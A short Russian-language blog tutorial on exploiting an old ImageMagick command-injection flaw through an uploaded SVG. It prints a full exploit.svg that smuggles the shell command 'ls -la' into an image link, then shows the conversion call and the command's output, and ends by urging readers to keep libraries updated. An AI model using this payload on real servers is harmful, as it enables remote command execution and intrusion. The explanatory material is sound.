May 16, 2022

Взлом с помощью фотографии. ImageMagick

Введение:

В этой статье мы увидим как возможно взломать веб-сайт лишь залив спроектированную картинку!

Как такое возможно?

Все просто, ImageMagick — популярный пакет для обработки изображений имеет множество уязвимостей, хоть они и были устранены несколько лет назад, многие сайты до сих пор используют уязвимые версии!

Уязвимость позволяет нам выполнять свой собственный код на сервере сайта, что даст на доступ к командной строке.

Основное:

В чем суть взлома?

Создается специальная svg картинка, содержащая в себе специальный код. ImageMagick трактует код таким образом, что система исполняет указанную в коде команду.

Такой вид уязвимости является очень опасным, ведь может предоставить атакующему полный доступ.

Давайте создадим вредоносную картинку, назвав exploit.svg:

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg width="640px" height="480px" version="1.1"
xmlns="http://www.w3.org/2000/svg" xmlns:xlink=
"http://www.w3.org/1999/xlink">
<image xlink:href="https://example.com/image.jpg&quot;|ls &quot;-la"
x="0" y="0" height="640px" width="480px"/>
</svg>

Если сайт выполнит команду:

convert exploit.svg out.png

То будет выполнена и команда ls -la:

$ convert exploit.svg out.png
total 32
drwxr-xr-x 6 user group 204
drwxr-xr-x+ 232 user group 7888
...

Вывод:

Уязвимость в ImageMagick является невероятно опасной как мы убедились в данной статье, хоть она и устранена на большинстве серверов. Подобные уязвимости делают веб-сайт легкой добычей для хакеров, а потому нужно всегда обновлять свои библиотеки до последних версий!

Внимание! Вся информация строго в ознакомительно-познавательных целях. Автор данной статьи, а также ресурс на котором он размещает данную статью, не несут ответственности за любые последствия от ее прочтения, а также за ваше плохое самочувствие, детей - двоечников и долги по ипотеке.